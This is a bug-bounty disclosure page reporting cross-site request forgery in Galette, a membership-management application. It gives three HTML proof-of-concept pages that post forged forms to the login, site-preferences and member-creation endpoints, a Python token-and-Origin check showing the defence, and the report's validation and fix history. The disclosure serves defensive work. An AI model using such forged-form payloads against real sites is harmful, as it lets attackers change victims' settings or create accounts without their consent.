Cross-Site Request Forgery (CSRF) in galette/galette

Valid

Reported on Sep 25th 2021

Description

An attacker is able to execute a CSRF attack when a logged-in user visits a malicious page: the application's state-changing POST endpoints accept form submissions that originate from another site.

Proof of Concept

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/login" method="POST">
      <input type="hidden" name="login" value="test" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="ident" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability allows an attacker to submit forged requests on behalf of a logged-in user through a crafted malicious page.

Occurrences

Allows an attacker to change site preferences if an administrator visits a malicious page.

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/preferences" method="POST">
      <input type="hidden" name="pref&#95;nom" value="TEST CSRF" />
      <input type="hidden" name="pref&#95;slogan" value="" />
      <input type="hidden" name="pref&#95;footer" value="" />
      <input type="hidden" name="logo" value="" />
      <input type="hidden" name="pref&#95;adresse" value="&#45;" />
      <input type="hidden" name="pref&#95;adresse2" value="" />
      <input type="hidden" name="pref&#95;cp" value="" />
      <input type="hidden" name="pref&#95;ville" value="" />
      <input type="hidden" name="pref&#95;pays" value="" />
      <input type="hidden" name="pref&#95;postal&#95;adress" value="0" />
      <input type="hidden" name="pref&#95;postal&#95;staff&#95;member" value="&#45;1" />
      <input type="hidden" name="pref&#95;website" value="" />
      <input type="hidden" name="pref&#95;googleplus" value="" />
      <input type="hidden" name="pref&#95;facebook" value="" />
      <input type="hidden" name="pref&#95;twitter" value="" />
      <input type="hidden" name="pref&#95;linkedin" value="" />
      <input type="hidden" name="pref&#95;viadeo" value="" />
      <input type="hidden" name="pref&#95;lang" value="en&#95;US" />
      <input type="hidden" name="pref&#95;numrows" value="10" />
      <input type="hidden" name="pref&#95;redirect&#95;on&#95;create" value="0" />
      <input type="hidden" name="pref&#95;log" value="1" />
      <input type="hidden" name="pref&#95;statut" value="9" />
      <input type="hidden" name="pref&#95;filter&#95;account" value="0" />
      <input type="hidden" name="pref&#95;membership&#95;ext" value="12" />
      <input type="hidden" name="pref&#95;beg&#95;membership" value="" />
      <input type="hidden" name="pref&#95;membership&#95;offermonths" value="0" />
      <input type="hidden" name="pref&#95;bool&#95;publicpages" value="1" />
      <input type="hidden" name="pref&#95;publicpages&#95;visibility" value="1" />
      <input type="hidden" name="pref&#95;bool&#95;selfsubscribe" value="1" />
      <input type="hidden" name="pref&#95;new&#95;contrib&#95;script" value="" />
      <input type="hidden" name="pref&#95;rss&#95;url" value="http&#58;&#47;&#47;galette&#46;eu&#47;dc&#47;index&#46;php&#47;feed&#47;atom" />
      <input type="hidden" name="pref&#95;galette&#95;url" value="" />
      <input type="hidden" name="pref&#95;email&#95;nom" value="Galette" />
      <input type="hidden" name="pref&#95;email" value="mail&#64;domain&#46;com" />
      <input type="hidden" name="pref&#95;email&#95;reply&#95;to" value="" />
      <input type="hidden" name="pref&#95;email&#95;newadh" value="mail&#64;domain&#46;com" />
      <input type="hidden" name="pref&#95;bool&#95;wrap&#95;mails" value="1" />
      <input type="hidden" name="pref&#95;mail&#95;method" value="0" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;host" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;port" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;user" value="" />
      <input type="hidden" name="pref&#95;mail&#95;smtp&#95;password" value="" />
      <input type="hidden" name="pref&#95;mail&#95;sign" value="&#123;NAME&#125;&#13;&#10;&#13;&#10;&#123;WEBSITE&#125;&#13;&#10;&#123;GOOGLEPLUS&#125;&#13;&#10;&#123;FACEBOOK&#125;&#13;&#10;&#123;TWITTER&#125;&#13;&#10;&#123;LINKEDIN&#125;&#13;&#10;&#123;VIADEO&#125;" />
      <input type="hidden" name="pref&#95;etiq&#95;marges&#95;v" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;marges&#95;h" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;hspace" value="10" />
      <input type="hidden" name="pref&#95;etiq&#95;vspace" value="5" />
      <input type="hidden" name="pref&#95;etiq&#95;hsize" value="90" />
      <input type="hidden" name="pref&#95;etiq&#95;vsize" value="35" />
      <input type="hidden" name="pref&#95;etiq&#95;cols" value="2" />
      <input type="hidden" name="pref&#95;etiq&#95;rows" value="7" />
      <input type="hidden" name="pref&#95;etiq&#95;corps" value="12" />
      <input type="hidden" name="pref&#95;card&#95;abrev" value="GALETTE" />
      <input type="hidden" name="pref&#95;card&#95;strip" value="Gestion&#32;d&apos;Adherents&#32;en&#32;Ligne&#32;Extrêmement&#32;TarabiscotÃ&#169;e" />
      <input type="hidden" name="pref&#95;card&#95;tcol" value="&#35;ffffff" />
      <input type="hidden" name="pref&#95;card&#95;scol" value="&#35;8c2453" />
      <input type="hidden" name="pref&#95;card&#95;bcol" value="&#35;53248c" />
      <input type="hidden" name="pref&#95;card&#95;hcol" value="&#35;248c53" />
      <input type="hidden" name="card&#95;logo" value="" />
      <input type="hidden" name="pref&#95;card&#95;self" value="1" />
      <input type="hidden" name="pref&#95;card&#95;address" value="1" />
      <input type="hidden" name="pref&#95;card&#95;year" value="2021" />
      <input type="hidden" name="pref&#95;card&#95;marges&#95;v" value="15" />
      <input type="hidden" name="pref&#95;card&#95;marges&#95;h" value="20" />
      <input type="hidden" name="pref&#95;card&#95;vspace" value="5" />
      <input type="hidden" name="pref&#95;card&#95;hspace" value="10" />
      <input type="hidden" name="pref&#95;password&#95;length" value="6" />
      <input type="hidden" name="pref&#95;password&#95;strength" value="0" />
      <input type="hidden" name="pref&#95;admin&#95;login" value="admin" />
      <input type="hidden" name="pref&#95;admin&#95;pass" value="" />
      <input type="hidden" name="pref&#95;admin&#95;pass&#95;check" value="" />
      <input type="hidden" name="valid" value="1" />
      <input type="hidden" name="pref&#95;theme" value="default" />
      <input type="hidden" name="pref&#95;telemetry&#95;date" value="" />
      <input type="hidden" name="pref&#95;instance&#95;uuid" value="" />
      <input type="hidden" name="pref&#95;registration&#95;date" value="" />
      <input type="hidden" name="pref&#95;registration&#95;uuid" value="93" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/webroot/index.php/member/store" method="POST">
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="titre&#95;adh" value="" />
      <input type="hidden" name="sexe&#95;adh" value="0" />
      <input type="hidden" name="nom&#95;adh" value="test" />
      <input type="hidden" name="prenom&#95;adh" value="" />
      <input type="hidden" name="societe&#95;adh" value="" />
      <input type="hidden" name="pseudo&#95;adh" value="" />
      <input type="hidden" name="ddn&#95;adh" value="" />
      <input type="hidden" name="lieu&#95;naissance" value="" />
      <input type="hidden" name="prof&#95;adh" value="" />
      <input type="hidden" name="pref&#95;lang" value="en&#95;US" />
      <input type="hidden" name="adresse&#95;adh" value="123213123" />
      <input type="hidden" name="adresse2&#95;adh" value="" />
      <input type="hidden" name="cp&#95;adh" value="312312" />
      <input type="hidden" name="ville&#95;adh" value="gfgdfgf" />
      <input type="hidden" name="pays&#95;adh" value="" />
      <input type="hidden" name="tel&#95;adh" value="" />
      <input type="hidden" name="gsm&#95;adh" value="" />
      <input type="hidden" name="email&#95;adh" value="" />
      <input type="hidden" name="url&#95;adh" value="" />
      <input type="hidden" name="jabber&#95;adh" value="" />
      <input type="hidden" name="gpgid" value="" />
      <input type="hidden" name="activite&#95;adh" value="1" />
      <input type="hidden" name="id&#95;statut" value="9" />
      <input type="hidden" name="login&#95;adh" value="test1" />
      <input type="hidden" name="mdp&#95;adh" value="test1234" />
      <input type="hidden" name="mdp&#95;adh2" value="test1234" />
      <input type="hidden" name="date&#95;crea&#95;adh" value="2021&#45;09&#45;25" />
      <input type="hidden" name="info&#95;adh" value="" />
      <input type="hidden" name="info&#95;public&#95;adh" value="" />
      <input type="hidden" name="redirect&#95;on&#95;create" value="0" />
      <input type="hidden" name="valid" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
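As an added defender-side example (not galette's code and not the merged fix), the following check models the synchronizer-token and Origin validation that rejects the three cross-site posts above. TOKEN_FIELD, SITE_ORIGIN, the request dict shape and the attacker.example origin are assumptions made for this illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed illustration: requests are plain dicts (method, path, headers,
# form) and the session is a dict holding the server-side copy of the token.
TOKEN_FIELD = "csrf_token"              # assumed hidden-field name
SITE_ORIGIN = "http://localhost:8081"   # origin the report's PoCs target


def issue_token(session: dict) -> str:
    """Create one unguessable token per session and keep it server-side."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def check_request(req: dict, session: dict) -> tuple:
    """Return (allowed, reason). Safe methods pass; any other method needs a
    same-site Origin/Referer (when the browser sends one) and a valid token."""
    if req["method"].upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    # Defence 1: an Origin or Referer header, if present, must be our own site.
    hdrs = {k.lower(): v for k, v in req.get("headers", {}).items()}
    source = hdrs.get("origin") or hdrs.get("referer")
    if source is not None:
        parts = urlsplit(source)
        if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
            return False, f"cross-site origin {source}"
    # Defence 2: the hidden form token must match the session copy.
    expected = session.get(TOKEN_FIELD)
    submitted = req.get("form", {}).get(TOKEN_FIELD)
    if not expected or not submitted:
        return False, "missing csrf token"
    if not hmac.compare_digest(expected, submitted):  # constant-time compare
        return False, "bad csrf token"
    return True, "ok"


def replay_report_pocs(session: dict) -> dict:
    """Model the /login and /preferences posts as a browser would send them
    from the attacker's page: no token, foreign Origin (constructed values)."""
    posts = (
        ("/webroot/index.php/login", {"login": "test", "password": "test", "ident": "1"}),
        ("/webroot/index.php/preferences", {"pref_nom": "TEST CSRF", "valid": "1"}),
    )
    results = {}
    for path, form in posts:
        req = {"method": "POST", "path": path,
               "headers": {"Origin": "http://attacker.example"}, "form": form}
        results[path] = check_request(req, session)
    return results
```

A browser that omits Origin entirely (older clients, some privacy settings) still fails at the token check, which is why the token is the primary defence and the origin check only an additional layer.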
N modified their report (4 months ago)

Ziding Zhang (Admin), 4 months ago:

Hey N, I've opened a PR asking for a security policy.

N (Researcher), 4 months ago:

@Admin Any update from the maintainer?

Adam Nygate validated this vulnerability 3 months ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johan Cwiklinski confirmed that a fix has been merged on a5602b 2 months ago
Johan Cwiklinski has been awarded the fix bounty
member.tpl#L1-L364 has been validated
preferences.tpl#L1-L687 has been validated